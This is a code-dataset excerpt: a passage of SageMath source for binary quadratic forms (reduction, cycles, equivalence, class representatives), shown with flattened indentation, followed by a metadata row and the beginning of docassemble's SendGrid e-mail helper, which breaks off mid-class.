sage: BinaryQF(1, 9, 4).reduced_form(transformation=True)
(
[ 0 -1]
4*x^2 + 7*x*y - y^2, [ 1 2]
)
sage: BinaryQF(3, 7, -2).reduced_form(transformation=True)
(
[1 0]
3*x^2 + 7*x*y - 2*y^2, [0 1]
)
sage: BinaryQF(-6, 6, -1).reduced_form(transformation=True)
(
[ 0 -1]
-x^2 + 2*x*y + 2*y^2, [ 1 -4]
)
"""
if self.is_reduced():
if transformation:
return self, Matrix(ZZ, 2, 2, [1, 0, 0, 1])
else:
return self
if algorithm == "default":
if self.is_reducible() or (self.discriminant() > 0 and transformation):
algorithm = 'sage'
elif not transformation:
algorithm = 'pari'
else:
raise NotImplementedError('reduction of definite binary '
'quadratic forms with transformation=True is not '
'implemented')
if algorithm == 'sage':
if self.discriminant() <= 0:
raise NotImplementedError('reduction of definite binary '
'quadratic forms is not implemented in Sage')
return self._reduce_indef(transformation)
elif algorithm == 'pari':
if transformation:
raise NotImplementedError('transformation=True is not '
'supported using PARI')
elif self.is_reducible():
raise NotImplementedError('reducible forms are not '
'supported using PARI')
return BinaryQF(self.__pari__().qfbred())
else:
raise ValueError('unknown implementation for binary quadratic form '
'reduction: %s' % algorithm)
# Buchmann/Vollmer cycle algorithm
def _RhoTau(self):
"""
Apply Rho and Tau operators to this form, returning a new form `Q`.
EXAMPLES::
sage: f = BinaryQF(1, 8, -3)
sage: f._RhoTau()
3*x^2 + 4*x*y - 5*y^2
"""
d = self.discriminant().sqrt(prec=53)
a = self._a
b = self._b
c = self._c
cabs = c.abs()
sign = c.sign()
if cabs >= d:
s = sign * ((cabs+b) / (2*cabs)).floor()
else:
s = sign * ((d+b) / (2*cabs)).floor()
Q = BinaryQF(-c, -b + 2*s*c, -(a - b*s + c*s*s))
return Q
def _Rho(self):
"""
Apply the Rho operator to this form, returning a new form `Q`.
EXAMPLES::
sage: f = BinaryQF(1, 8, -3)
sage: f._Rho()
-3*x^2 + 4*x*y + 5*y^2
"""
d = self.discriminant().sqrt(prec=53)
a = self._a
b = self._b
c = self._c
cabs = c.abs()
sign = c.sign()
if cabs >= d:
s = sign * ((cabs+b) / (2*cabs)).floor()
else:
s = sign * ((d+b) / (2*cabs)).floor()
Q = BinaryQF(c, -b + 2*s*c, a - b*s + c*s*s)
return Q
def _Tau(self):
"""
Apply the Tau operator to this form, returning a new form `Q`.
EXAMPLES::
sage: f = BinaryQF(1, 8, -3)
sage: f._Tau()
-x^2 + 8*x*y + 3*y^2
"""
a = self._a
b = self._b
c = self._c
Q = BinaryQF(-a, b, -c)
return Q
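    # Note: _Tau sends a*x^2 + b*x*y + c*y^2 to -a*x^2 + b*x*y - c*y^2,
    # i.e. to -f(x, -y); together with _Rho it drives the cycle traversal below.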
def cycle(self, proper=False):
"""
Return the cycle of reduced forms to which ``self`` belongs.
This is based on Algorithm 6.1 of [BUVO2007]_.
INPUT:
- ``self`` -- reduced, indefinite form of non-square discriminant
- ``proper`` -- boolean (default: ``False``); if ``True``, return the
proper cycle
The proper cycle of a form `f` consists of all reduced forms that are
properly equivalent to `f`. This is useful when testing for proper
equivalence (or equivalence) between indefinite forms.
The cycle of `f` is a technical tool that is used when computing the proper
cycle. Our definition of the cycle is slightly different from the one
in [BUVO2007]_. In our definition, the cycle consists of all reduced
forms `g`, such that the `a`-coefficient of `g` has the same sign as the
`a`-coefficient of `f`, and `g` can be obtained from `f` by performing a
change of variables, and then multiplying by the determinant of the
change-of-variables matrix. It is important to note that `g` might not be
equivalent to `f` (because of multiplying by the determinant). However,
        either `g` or `-g` must be equivalent to `f`. Also note that the cycle
does contain `f`. (Under the definition in [BUVO2007]_, the cycle might
not contain `f`, because all forms in the cycle are required to have
positive `a`-coefficient, even if the `a`-coefficient of `f` is negative.)
EXAMPLES::
sage: Q = BinaryQF(14, 17, -2)
sage: Q.cycle()
[14*x^2 + 17*x*y - 2*y^2,
2*x^2 + 19*x*y - 5*y^2,
5*x^2 + 11*x*y - 14*y^2]
sage: Q.cycle(proper=True)
[14*x^2 + 17*x*y - 2*y^2,
-2*x^2 + 19*x*y + 5*y^2,
5*x^2 + 11*x*y - 14*y^2,
-14*x^2 + 17*x*y + 2*y^2,
2*x^2 + 19*x*y - 5*y^2,
-5*x^2 + 11*x*y + 14*y^2]
sage: Q = BinaryQF(1, 8, -3)
sage: Q.cycle()
[x^2 + 8*x*y - 3*y^2,
3*x^2 + 4*x*y - 5*y^2,
5*x^2 + 6*x*y - 2*y^2,
2*x^2 + 6*x*y - 5*y^2,
5*x^2 + 4*x*y - 3*y^2,
3*x^2 + 8*x*y - y^2]
sage: Q.cycle(proper=True)
[x^2 + 8*x*y - 3*y^2,
-3*x^2 + 4*x*y + 5*y^2,
5*x^2 + 6*x*y - 2*y^2,
-2*x^2 + 6*x*y + 5*y^2,
5*x^2 + 4*x*y - 3*y^2,
-3*x^2 + 8*x*y + y^2]
sage: Q = BinaryQF(1, 7, -6)
sage: Q.cycle()
[x^2 + 7*x*y - 6*y^2,
6*x^2 + 5*x*y - 2*y^2,
2*x^2 + 7*x*y - 3*y^2,
3*x^2 + 5*x*y - 4*y^2,
4*x^2 + 3*x*y - 4*y^2,
4*x^2 + 5*x*y - 3*y^2,
3*x^2 + 7*x*y - 2*y^2,
2*x^2 + 5*x*y - 6*y^2,
6*x^2 + 7*x*y - y^2]
TESTS:
Check an example in :trac:`28989`::
sage: Q = BinaryQF(1, 1, -1)
sage: Q.cycle(proper=True)
[x^2 + x*y - y^2, -x^2 + x*y + y^2]
This is Example 6.10.6 of [BUVO2007]_::
sage: Q = BinaryQF(1, 7, -6)
sage: Q.cycle()
[x^2 + 7*x*y - 6*y^2,
6*x^2 + 5*x*y - 2*y^2,
2*x^2 + 7*x*y - 3*y^2,
3*x^2 + 5*x*y - 4*y^2,
4*x^2 + 3*x*y - 4*y^2,
4*x^2 + 5*x*y - 3*y^2,
3*x^2 + 7*x*y - 2*y^2,
2*x^2 + 5*x*y - 6*y^2,
6*x^2 + 7*x*y - y^2]
sage: Q.cycle(proper=True)
[x^2 + 7*x*y - 6*y^2,
-6*x^2 + 5*x*y + 2*y^2,
2*x^2 + 7*x*y - 3*y^2,
-3*x^2 + 5*x*y + 4*y^2,
4*x^2 + 3*x*y - 4*y^2,
-4*x^2 + 5*x*y + 3*y^2,
3*x^2 + 7*x*y - 2*y^2,
-2*x^2 + 5*x*y + 6*y^2,
6*x^2 + 7*x*y - y^2,
-x^2 + 7*x*y + 6*y^2,
6*x^2 + 5*x*y - 2*y^2,
-2*x^2 + 7*x*y + 3*y^2,
3*x^2 + 5*x*y - 4*y^2,
-4*x^2 + 3*x*y + 4*y^2,
4*x^2 + 5*x*y - 3*y^2,
-3*x^2 + 7*x*y + 2*y^2,
2*x^2 + 5*x*y - 6*y^2,
-6*x^2 + 7*x*y + y^2]
This is Example 6.10.7 of [BUVO2007]_::
sage: Q = BinaryQF(1, 8, -3)
sage: Q.cycle()
[x^2 + 8*x*y - 3*y^2,
3*x^2 + 4*x*y - 5*y^2,
5*x^2 + 6*x*y - 2*y^2,
2*x^2 + 6*x*y - 5*y^2,
5*x^2 + 4*x*y - 3*y^2,
3*x^2 + 8*x*y - y^2]
sage: Q.cycle(proper=True)
[x^2 + 8*x*y - 3*y^2,
-3*x^2 + 4*x*y + 5*y^2,
5*x^2 + 6*x*y - 2*y^2,
-2*x^2 + 6*x*y + 5*y^2,
5*x^2 + 4*x*y - 3*y^2,
-3*x^2 + 8*x*y + y^2]
sage: Q.cycle(proper=True) # should be the same as the previous one
[x^2 + 8*x*y - 3*y^2,
-3*x^2 + 4*x*y + 5*y^2,
5*x^2 + 6*x*y - 2*y^2,
-2*x^2 + 6*x*y + 5*y^2,
5*x^2 + 4*x*y - 3*y^2,
-3*x^2 + 8*x*y + y^2]
Try an example where a is negative::
sage: Q = BinaryQF(-1, 8, 3)
sage: Q.cycle(proper=True)
[-x^2 + 8*x*y + 3*y^2,
3*x^2 + 4*x*y - 5*y^2,
-5*x^2 + 6*x*y + 2*y^2,
2*x^2 + 6*x*y - 5*y^2,
-5*x^2 + 4*x*y + 3*y^2,
3*x^2 + 8*x*y - y^2]
"""
if not (self.is_indef() and self.is_reduced()):
raise ValueError("%s must be indefinite and reduced" % self)
if self.discriminant().is_square():
# Buchmann/Vollmer assume the discriminant to be non-square
raise NotImplementedError('computation of cycles is only '
'implemented for non-square discriminants')
if proper:
# Prop 6.10.5 in Buchmann Vollmer
C = list(self.cycle(proper=False)) # make a copy so we can modify it
if len(C) % 2:
C += C
for i in range(len(C)//2):
C[2*i+1] = C[2*i+1]._Tau()
return C
if not hasattr(self, '_cycle_list'):
C = [self]
Q1 = self._RhoTau()
while not self == Q1:
C.append(Q1)
Q1 = Q1._RhoTau()
self._cycle_list = C
return self._cycle_list
def is_positive_definite(self):
"""
Return ``True`` if ``self`` is positive definite, i.e., has
negative discriminant with `a > 0`.
EXAMPLES::
sage: Q = BinaryQF(195751, 37615, 1807)
sage: Q.is_positive_definite()
True
sage: Q = BinaryQF(195751, 1212121, -1876411)
sage: Q.is_positive_definite()
False
"""
return self.discriminant() < 0 and self._a > 0
is_posdef = is_positive_definite
def is_negative_definite(self):
"""
Return ``True`` if ``self`` is negative definite, i.e., has
negative discriminant with `a < 0`.
EXAMPLES::
sage: Q = BinaryQF(-1, 3, -5)
sage: Q.is_positive_definite()
False
sage: Q.is_negative_definite()
True
"""
return self.discriminant() < 0 and self._a < 0
is_negdef = is_negative_definite
def is_indefinite(self):
"""
        Return whether ``self`` is indefinite, i.e., has positive discriminant.
EXAMPLES::
sage: Q = BinaryQF(1, 3, -5)
sage: Q.is_indef()
True
"""
return self.discriminant() > 0
is_indef = is_indefinite
def is_singular(self):
"""
        Return whether ``self`` is singular, i.e., has zero discriminant.
EXAMPLES::
sage: Q = BinaryQF(1, 3, -5)
sage: Q.is_singular()
False
sage: Q = BinaryQF(1, 2, 1)
sage: Q.is_singular()
True
"""
return self.discriminant().is_zero()
def is_nonsingular(self):
"""
        Return whether this form is nonsingular, i.e., has non-zero discriminant.
EXAMPLES::
sage: Q = BinaryQF(1, 3, -5)
sage: Q.is_nonsingular()
True
sage: Q = BinaryQF(1, 2, 1)
sage: Q.is_nonsingular()
False
"""
return not self.discriminant().is_zero()
def is_equivalent(self, other, proper=True):
"""
        Return whether ``self`` is equivalent to ``other``.
        INPUT:
        - ``other`` -- a binary quadratic form
        - ``proper`` -- bool (default: ``True``); if ``True``, use proper
          equivalence
EXAMPLES::
sage: Q3 = BinaryQF(4, 4, 15)
sage: Q2 = BinaryQF(4, -4, 15)
sage: Q2.is_equivalent(Q3)
True
sage: a = BinaryQF([33, 11, 5])
sage: b = a.reduced_form(); b
5*x^2 - x*y + 27*y^2
sage: a.is_equivalent(b)
True
sage: a.is_equivalent(BinaryQF((3, 4, 5)))
False
Some indefinite examples::
sage: Q1 = BinaryQF(9, 8, -7)
sage: Q2 = BinaryQF(9, -8, -7)
sage: Q1.is_equivalent(Q2, proper=True)
False
sage: Q1.is_equivalent(Q2, proper=False)
True
TESTS:
We check that :trac:`25888` is fixed::
sage: Q1 = BinaryQF(3, 4, -2)
sage: Q2 = BinaryQF(-2, 4, 3)
sage: Q1.is_equivalent(Q2) == Q2.is_equivalent(Q1)
True
sage: Q1.is_equivalent(Q2, proper=False) == Q2.is_equivalent(Q1, proper=False)
True
sage: Q1.is_equivalent(Q2, proper=True)
True
We check that the first part of :trac:`29028` is fixed::
sage: Q = BinaryQF(0, 2, 0)
sage: Q.discriminant()
4
sage: Q.is_equivalent(Q, proper=True)
True
sage: Q.is_equivalent(Q, proper=False)
True
A test for rational forms::
sage: Q1 = BinaryQF(0, 4, 2)
sage: Q2 = BinaryQF(2, 4, 0)
sage: Q1.is_equivalent(Q2, proper=False)
True
Test another part of :trac:`28989`::
sage: Q1, Q2 = BinaryQF(1, 1, -1), BinaryQF(-1, 1, 1)
sage: Q1.is_equivalent(Q2, proper=True)
True
"""
if type(other) != type(self):
raise TypeError("%s is not a BinaryQF" % other)
if self.discriminant() != other.discriminant():
return False
if self.is_indef():
# First, reduce self and other
selfred = self.reduced_form()
otherred = other.reduced_form()
if self.discriminant().is_square():
# make sure we terminate in a form
# with c = 0
while selfred[2] != 0:
selfred = selfred._Rho()
while otherred[2] != 0:
otherred = otherred._Rho()
b = selfred._b
a = selfred._a
ao = otherred._a
assert otherred._b == b
# p. 359 of Conway-Sloane [CS1999]_
# but `2b` in their notation is `b` in our notation
is_properly_equiv = ((a-ao) % b == 0)
if proper:
return is_properly_equiv
else:
g = gcd(a, b)
return is_properly_equiv or ((gcd(ao,b) == g) and ((a*ao - g**2) % (b*g) == 0))
proper_cycle = otherred.cycle(proper=True)
is_prop = selfred in proper_cycle
if proper or is_prop:
return is_prop
# note that our definition of improper equivalence
# differs from that of Buchmann and Vollmer
# their action is det f * q(f(x, y))
# ours is q(f(x, y))
# an improper equivalence in our convention
selfred = BinaryQF(selfred._c, selfred._b, selfred._a)
assert selfred.is_reduced()
return selfred in proper_cycle
# Else we're dealing with definite forms.
if self.is_posdef() and not other.is_posdef():
return False
if self.is_negdef() and not other.is_negdef():
return False
Q1 = self.reduced_form()
Q2 = other.reduced_form()
if Q1 == Q2:
return True
if not proper:
Q1e = BinaryQF(self._c, self._b, self._a).reduced_form()
return Q1e == Q2
return False
@cached_method
def is_reduced(self):
r"""
        Return whether ``self`` is reduced.
Let `f = a x^2 + b xy + c y^2` be a binary quadratic form of
discriminant `D`.
- If `f` is positive definite (`D < 0` and `a > 0`), then `f`
is reduced if and only if `|b|\leq a \leq c`, and `b\geq 0`
if either `a = b` or `a = c`.
- If `f` is negative definite (`D < 0` and `a < 0`), then `f`
is reduced if and only if the positive definite form with
coefficients `(-a, b, -c)` is reduced.
- If `f` is indefinite (`D > 0`), then `f` is reduced if and
only if `|\sqrt{D} - 2|a|| < b < \sqrt{D}`
or `a = 0` and `-b < 2c \leq b`
or `c = 0` and `-b < 2a \leq b`
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3])
sage: Q.is_reduced()
False
sage: Q = BinaryQF([2, 1, 3])
sage: Q.is_reduced()
True
sage: Q = BinaryQF([1, -1, 1])
sage: Q.is_reduced()
False
sage: Q = BinaryQF([1, 1, 1])
sage: Q.is_reduced()
True
Examples using indefinite forms::
sage: f = BinaryQF(-1, 2, 2)
sage: f.is_reduced()
True
sage: BinaryQF(1, 9, 4).is_reduced()
False
sage: BinaryQF(1, 5, -1).is_reduced()
True
"""
D = self.discriminant()
a = self._a
b = self._b
c = self._c
if D < 0 and a > 0:
return ((-a < b <= a < c)
or (ZZ(0) <= b <= a == c))
        elif D < 0 and a < 0:
return ((a < b <= -a < -c)
or (ZZ(0) <= b <= -a == -c))
else:
d = D.sqrt(prec=53)
return (((d - 2*a.abs()).abs() < b < d)
or (0 == a and -b < 2*c <= b)
or (0 == c and -b < 2*a <= b))
def complex_point(self):
r"""
Return the point in the complex upper half-plane associated to ``self``.
This form, `ax^2 + b xy + cy^2`, must be definite with
negative discriminant `b^2 - 4 a c < 0`.
OUTPUT:
- the unique complex root of `a x^2 + b x + c` with positive
imaginary part
EXAMPLES::
sage: Q = BinaryQF([1, 0, 1])
sage: Q.complex_point()
1.00000000000000*I
"""
if self.discriminant() >= 0:
raise ValueError("only defined for negative discriminant")
Q1 = ZZ['x']([self._c, self._b, self._a])
return [z for z in Q1.complex_roots() if z.imag() > 0][0]
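    # Explicitly, for a positive definite form the point is
    # (-b + sqrt(D))/(2*a) = (-b + I*sqrt(-D))/(2*a), the root of
    # a*x^2 + b*x + c with positive imaginary part.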
def matrix_action_left(self, M):
r"""
Return the binary quadratic form resulting from the left action
of the 2-by-2 matrix `M` on ``self``.
Here the action of the matrix `M = \begin{pmatrix} a & b \\ c & d
\end{pmatrix}` on the form `Q(x, y)` produces the form `Q(ax+cy,
bx+dy)`.
EXAMPLES::
sage: Q = BinaryQF([2, 1, 3]); Q
2*x^2 + x*y + 3*y^2
sage: M = matrix(ZZ, [[1, 2], [3, 5]])
sage: Q.matrix_action_left(M)
16*x^2 + 83*x*y + 108*y^2
"""
v, w = M.rows()
a1 = self(v)
c1 = self(w)
b1 = self(v + w) - a1 - c1
return BinaryQF([a1, b1, c1])
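    # The middle coefficient is recovered from the polarization identity
    # Q(v + w) = Q(v) + Q(w) + B(v, w), so b1 = Q(v + w) - a1 - c1; the same
    # trick is used in matrix_action_right below.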
def matrix_action_right(self, M):
r"""
Return the binary quadratic form resulting from the right action
of the 2-by-2 matrix `M` on ``self``.
Here the action of the matrix `M = \begin{pmatrix} a & b \\ c & d
\end{pmatrix}` on the form `Q(x, y)` produces the form `Q(ax+by,
cx+dy)`.
EXAMPLES::
sage: Q = BinaryQF([2, 1, 3]); Q
2*x^2 + x*y + 3*y^2
sage: M = matrix(ZZ, [[1, 2], [3, 5]])
sage: Q.matrix_action_right(M)
32*x^2 + 109*x*y + 93*y^2
"""
v, w = M.columns()
a1 = self(v)
c1 = self(w)
b1 = self(v + w) - a1 - c1
return BinaryQF([a1, b1, c1])
def small_prime_value(self, Bmax=1000):
r"""
        Return a prime represented by this (primitive positive definite) binary form.
INPUT:
- ``Bmax`` -- a positive bound on the representing integers.
OUTPUT:
A prime number represented by the form.
.. NOTE::
This is a very elementary implementation which just substitutes
values until a prime is found.
EXAMPLES::
sage: [Q.small_prime_value() for Q in BinaryQF_reduced_representatives(-23, primitive_only=True)]
[23, 2, 2]
sage: [Q.small_prime_value() for Q in BinaryQF_reduced_representatives(-47, primitive_only=True)]
[47, 2, 2, 3, 3]
"""
from sage.sets.all import Set
from sage.arith.srange import xsrange
B = 10
while True:
llist = list(Set([self(x, y) for x in xsrange(-B, B) for y in xsrange(B)]))
llist = sorted([l for l in llist if l.is_prime()])
if llist:
return llist[0]
if B >= Bmax:
raise ValueError("Unable to find a prime value of %s" % self)
B += 10
def solve_integer(self, n):
r"""
Solve `Q(x, y) = n` in integers `x` and `y` where `Q` is this
quadratic form.
INPUT:
- ``n`` -- a positive integer
OUTPUT:
A tuple `(x, y)` of integers satisfying `Q(x, y) = n` or ``None``
if no such `x` and `y` exist.
EXAMPLES::
sage: Qs = BinaryQF_reduced_representatives(-23, primitive_only=True)
sage: Qs
[x^2 + x*y + 6*y^2, 2*x^2 - x*y + 3*y^2, 2*x^2 + x*y + 3*y^2]
sage: [Q.solve_integer(3) for Q in Qs]
[None, (0, 1), (0, 1)]
sage: [Q.solve_integer(5) for Q in Qs]
[None, None, None]
sage: [Q.solve_integer(6) for Q in Qs]
[(0, 1), (-1, 1), (1, 1)]
"""
a, b, c = self
d = self.discriminant()
if d >= 0 or a <= 0:
raise NotImplementedError("%s is not positive definite" % self)
ad = -d
an4 = 4*a*n
a2 = 2*a
from sage.arith.srange import xsrange
for y in xsrange(0, 1+an4//ad):
z2 = an4 + d*y**2
for z in z2.sqrt(extend=False, all=True):
if a2.divides(z-b*y):
x = (z-b*y)//a2
return (x, y)
return None
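    # The search above rests on completing the square:
    # 4*a*Q(x, y) = (2*a*x + b*y)^2 - D*y^2, so Q(x, y) = n forces
    # z^2 = 4*a*n + D*y^2 with z = 2*a*x + b*y; since D < 0, only finitely
    # many y can make the right-hand side non-negative.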
def BinaryQF_reduced_representatives(D, primitive_only=False, proper=True):
r"""
Return representatives for the classes of binary quadratic forms
of discriminant `D`.
INPUT:
- ``D`` -- (integer) a discriminant
    - ``primitive_only`` -- (boolean; default: ``False``): if ``True``, only
      return primitive forms.
    - ``proper`` -- (boolean; default: ``True``): if ``True``, return one
      representative per proper equivalence class; otherwise one per improper
      equivalence class.
OUTPUT:
(list) A lexicographically-ordered list of inequivalent reduced
representatives for the (im)proper equivalence classes of binary quadratic
forms of discriminant `D`. If ``primitive_only`` is ``True`` then
imprimitive forms (which only exist when `D` is not fundamental) are
omitted; otherwise they are included.
EXAMPLES::
sage: BinaryQF_reduced_representatives(-4)
[x^2 + y^2]
sage: BinaryQF_reduced_representatives(-163)
[x^2 + x*y + 41*y^2]
sage: BinaryQF_reduced_representatives(-12)
[x^2 + 3*y^2, 2*x^2 + 2*x*y + 2*y^2]
sage: BinaryQF_reduced_representatives(-16)
[x^2 + 4*y^2, 2*x^2 + 2*y^2]
sage: BinaryQF_reduced_representatives(-63)
[x^2 + x*y + 16*y^2, 2*x^2 - x*y + 8*y^2, 2*x^2 + x*y + 8*y^2, 3*x^2 + 3*x*y + 6*y^2, 4*x^2 + x*y + 4*y^2]
The number of inequivalent reduced binary forms with a fixed negative
fundamental discriminant D is the class number of the quadratic field
`\QQ(\sqrt{D})`::
sage: len(BinaryQF_reduced_representatives(-13*4))
2
sage: QuadraticField(-13*4, 'a').class_number()
2
sage: p = next_prime(2^20); p
1048583
sage: len(BinaryQF_reduced_representatives(-p))
689
sage: QuadraticField(-p, 'a').class_number()
689
sage: BinaryQF_reduced_representatives(-23*9)
[x^2 + x*y + 52*y^2,
2*x^2 - x*y + 26*y^2,
2*x^2 + x*y + 26*y^2,
3*x^2 + 3*x*y + 18*y^2,
4*x^2 - x*y + 13*y^2,
4*x^2 + x*y + 13*y^2,
6*x^2 - 3*x*y + 9*y^2,
6*x^2 + 3*x*y + 9*y^2,
8*x^2 + 7*x*y + 8*y^2]
sage: BinaryQF_reduced_representatives(-23*9, primitive_only=True)
[x^2 + x*y + 52*y^2,
2*x^2 - x*y + 26*y^2,
2*x^2 + x*y + 26*y^2,
4*x^2 - x*y + 13*y^2,
4*x^2 + x*y + 13*y^2,
8*x^2 + 7*x*y + 8*y^2]
TESTS::
sage: BinaryQF_reduced_representatives(73)
[4*x^2 + 3*x*y - 4*y^2]
sage: BinaryQF_reduced_representatives(76, primitive_only=True)
[-3*x^2 + 4*x*y + 5*y^2,
3*x^2 + 4*x*y - 5*y^2]
sage: BinaryQF_reduced_representatives(136)
[-5*x^2 + 4*x*y + 6*y^2,
-2*x^2 + 8*x*y + 9*y^2,
2*x^2 + 8*x*y - 9*y^2,
5*x^2 + 4*x*y - 6*y^2]
sage: BinaryQF_reduced_representatives(136, proper=False)
[-2*x^2 + 8*x*y + 9*y^2, 2*x^2 + 8*x*y - 9*y^2, 5*x^2 + 4*x*y - 6*y^2]
Check that the primitive_only keyword does something::
sage: BinaryQF_reduced_representatives(148, proper=False, primitive_only=False)
[x^2 + 12*x*y - y^2, 4*x^2 + 6*x*y - 7*y^2, 6*x^2 + 2*x*y - 6*y^2]
sage: BinaryQF_reduced_representatives(148, proper=False, primitive_only=True)
[x^2 + 12*x*y - y^2, 4*x^2 + 6*x*y - 7*y^2]
sage: BinaryQF_reduced_representatives(148, proper=True, primitive_only=True)
[-7*x^2 + 6*x*y + 4*y^2, x^2 + 12*x*y - y^2, 4*x^2 + 6*x*y - 7*y^2]
sage: BinaryQF_reduced_representatives(148, proper=True, primitive_only=False)
[-7*x^2 + 6*x*y + 4*y^2,
x^2 + 12*x*y - y^2,
4*x^2 + 6*x*y - 7*y^2,
6*x^2 + 2*x*y - 6*y^2]
Test another part of :trac:`29028`::
sage: BinaryQF_reduced_representatives(10^2, proper=False, primitive_only=False)
[-4*x^2 + 10*x*y,
-3*x^2 + 10*x*y,
-2*x^2 + 10*x*y,
-x^2 + 10*x*y,
10*x*y,
x^2 + 10*x*y,
2*x^2 + 10*x*y,
5*x^2 + 10*x*y]
sage: BinaryQF_reduced_representatives(10^2, proper=False, primitive_only=True)
[-3*x^2 + 10*x*y, -x^2 + 10*x*y, x^2 + 10*x*y]
sage: BinaryQF_reduced_representatives(10^2, proper=True, primitive_only=True)
[-3*x^2 + 10*x*y, -x^2 + 10*x*y, x^2 + 10*x*y, 3*x^2 + 10*x*y]
sage: BinaryQF_reduced_representatives(10^2, proper=True, primitive_only=False)
[-4*x^2 + 10*x*y,
-3*x^2 + 10*x*y,
-2*x^2 + 10*x*y,
-x^2 + 10*x*y,
10*x*y,
x^2 + 10*x*y,
2*x^2 + 10*x*y,
3*x^2 + 10*x*y,
4*x^2 + 10*x*y,
5*x^2 + 10*x*y]
"""
D = ZZ(D)
# For a fundamental discriminant all forms are primitive so we need not check:
if primitive_only:
primitive_only = not is_fundamental_discriminant(D)
form_list = []
from sage.arith.srange import xsrange
D4 = D % 4
if D4 == 2 or D4 == 3:
raise ValueError("%s is not a discriminant" % D)
if D > 0: # Indefinite
if D.is_square():
b = D.sqrt()
c = ZZ(0)
# -b/2 < a <= b/2
for a in xsrange((-b/2).floor() + 1, (b/2).floor() + 1):
if (not primitive_only) or (gcd([a,b,c]) == 1):
form_list.append(BinaryQF(a, b, c))
# We follow the description of Buchmann/Vollmer 6.7.1. They
# enumerate all reduced forms. We only want representatives.
else:
sqrt_d = D.sqrt(prec=53)
for b in xsrange(1, sqrt_d.floor() + 1):
if (D - b) % 2:
continue
A = (D - b**2) / 4
Low_a = ((sqrt_d - b) / 2).ceil()
High_a = (A.sqrt(prec=53)).floor()
for a in xsrange(Low_a, High_a + 1):
if a == 0:
continue
c = -A/a
if c in ZZ:
if (not primitive_only) or gcd([a, b, c]) == 1:
Q = BinaryQF(a, b, c)
Q1 = BinaryQF(-a, b, -c)
form_list.append(Q)
form_list.append(Q1)
if a.abs() != c.abs():
Q = BinaryQF(c, b, a)
Q1 = BinaryQF(-c, b, -a)
form_list.append(Q)
form_list.append(Q1)
else: # Definite
# Only iterate over positive a and over b of the same
# parity as D such that 4a^2 + D <= b^2 <= a^2
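        # (Derivation: c = (b^2 - D)/(4*a) together with |b| <= a <= c gives
        # b^2 <= a^2 and b^2 - D >= 4*a^2; moreover D = b^2 - 4*a*c <= -3*a^2,
        # which yields the bound a <= sqrt(-D/3) used in the loop below.)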
for a in xsrange(1, 1+((-D)//3).isqrt()):
a4 = 4*a
s = D + a*a4
w = 1+(s-1).isqrt() if s > 0 else 0
if w%2 != D%2:
w += 1
for b in xsrange(w, a+1, 2):
t = b*b-D
if t % a4 == 0:
c = t // a4
if (not primitive_only) or gcd([a, b, c]) == 1:
if b>0 and a>b and c>a:
form_list.append(BinaryQF([a, -b, c]))
form_list.append(BinaryQF([a, b, c]))
if not proper or D > 0:
# TODO:
# instead of filtering, enumerate only improper classes to start with
# filter for equivalence classes
form_list_new = []
for q in form_list:
if not any(q.is_equivalent(q1, proper=proper) for q1 in form_list_new):
form_list_new.append(q)
form_list = form_list_new
form_list.sort()
return form_list
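# A minimal end-to-end sketch (assuming a Sage session): the class number of
# discriminant -23 can be read off by counting reduced representatives.
#
#     sage: len(BinaryQF_reduced_representatives(-23))
#     3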
| 31.37537
| 142
| 0.467024
|
4a143e58a184bb21ae2ccd9e94c8505f112f4d6c
| 4,898
|
py
|
Python
|
docassemble_webapp/docassemble/webapp/sendgrid_mail.py
|
sadpe/docassemble
|
023fe1202d9ee8cc8a503811f8ecc4363a320c9e
|
[
"MIT"
] | null | null | null |
docassemble_webapp/docassemble/webapp/sendgrid_mail.py
|
sadpe/docassemble
|
023fe1202d9ee8cc8a503811f8ecc4363a320c9e
|
[
"MIT"
] | null | null | null |
docassemble_webapp/docassemble/webapp/sendgrid_mail.py
|
sadpe/docassemble
|
023fe1202d9ee8cc8a503811f8ecc4363a320c9e
|
[
"MIT"
] | null | null | null |
# Adapted from flask_mail
import time
import requests
from requests.auth import HTTPBasicAuth
from flask_mail import Message, BadHeaderError, sanitize_addresses, email_dispatched, contextmanager, current_app
from sendgrid import SendGridAPIClient
from sendgrid.helpers.mail import Mail as SGMail, Attachment, FileContent, FileName, FileType, Disposition, ContentId, Email, To
import sys
import base64
# `word` provides the translated "(no subject)" fallback used below; it is
# assumed to come from docassemble's translation helpers.
from docassemble.base.functions import word
class Connection(object):
def __init__(self, mail):
self.mail = mail
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, tb):
pass
def send(self, message, envelope_from=None):
assert message.send_to, "No recipients have been added"
assert message.sender, (
"The message does not specify a sender and a default sender "
"has not been configured")
if message.has_bad_headers():
raise BadHeaderError
if message.date is None:
message.date = time.time()
if not message.subject:
message.subject = word("(no subject)")
sgmessage = SGMail(
from_email=Email(message.sender),
to_emails=[To(addressee) for addressee in sanitize_addresses(message.recipients)],
subject=message.subject,
plain_text_content=message.body,
html_content=message.html)
if message.cc:
for recipient in list(sanitize_addresses(message.cc)):
sgmessage.add_cc(recipient)
if message.bcc:
for recipient in list(sanitize_addresses(message.bcc)):
sgmessage.add_bcc(recipient)
if message.attachments:
for flask_attachment in message.attachments:
attachment = Attachment()
attachment.file_content = FileContent(base64.b64encode(flask_attachment.data).decode())
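                # SendGrid's v3 API expects attachment content as a
                # base64-encoded string, hence the encode/decode above.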
attachment.file_type = FileType(flask_attachment.content_type)
attachment.file_name = FileName(flask_attachment.filename)
attachment.disposition = Disposition(flask_attachment.disposition)
sgmessage.add_attachment(attachment)
sg = SendGridAPIClient(self.mail.api_key)
response = sg.send(sgmessage)
if response.status_code >= 400:
sys.stderr.write("SendGrid status code: " + str(response.status_code) + "\n")
sys.stderr.write("SendGrid response headers: " + repr(response.headers) + "\n")
try:
sys.stderr.write(repr(response.body) + "\n")
            except Exception:
pass
raise Exception("Failed to send e-mail message to SendGrid")
email_dispatched.send(message, app=current_app._get_current_object())
def send_message(self, *args, **kwargs):
self.send(Message(*args, **kwargs))
class _MailMixin(object):
@contextmanager
def record_messages(self):
if not email_dispatched:
raise RuntimeError("blinker must be installed")
outbox = []
def _record(message, app):
outbox.append(message)
email_dispatched.connect(_record)
try:
yield outbox
finally:
email_dispatched.disconnect(_record)
def send(self, message):
with self.connect() as connection:
message.send(connection)
def send_message(self, *args, **kwargs):
self.send(Message(*args, **kwargs))
def connect(self):
app = getattr(self, "app", None) or current_app
try:
return Connection(app.extensions['mail'])
except KeyError:
            raise RuntimeError("The current application was not configured with Flask-Mail")
class _Mail(_MailMixin):
def __init__(self, api_key,
